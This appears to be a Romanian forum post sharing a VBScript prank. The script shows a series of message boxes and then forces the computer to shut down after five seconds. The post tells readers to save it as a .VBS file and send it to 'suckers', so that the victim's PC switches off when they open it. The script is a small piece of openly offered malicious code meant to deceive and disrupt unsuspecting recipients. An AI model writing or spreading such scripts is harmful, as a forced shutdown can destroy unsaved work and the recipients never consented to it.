| Copiaza: Code msgbox "Text1" msgbox "Text2" msgbox "Text3" msgbox "Text4" msgbox "Text5" msgbox "Text6" Dim wshshell set wshshell = wscript.CreateObject("WScript.Shell" ) wshshell.run "shutdown -s -f -t 5" Si il salvati sub forma unui fisier .VBS si il trimiteti unor fraieri ,iar cand il deschide i se va Stinge automat PC-u
[hr]
|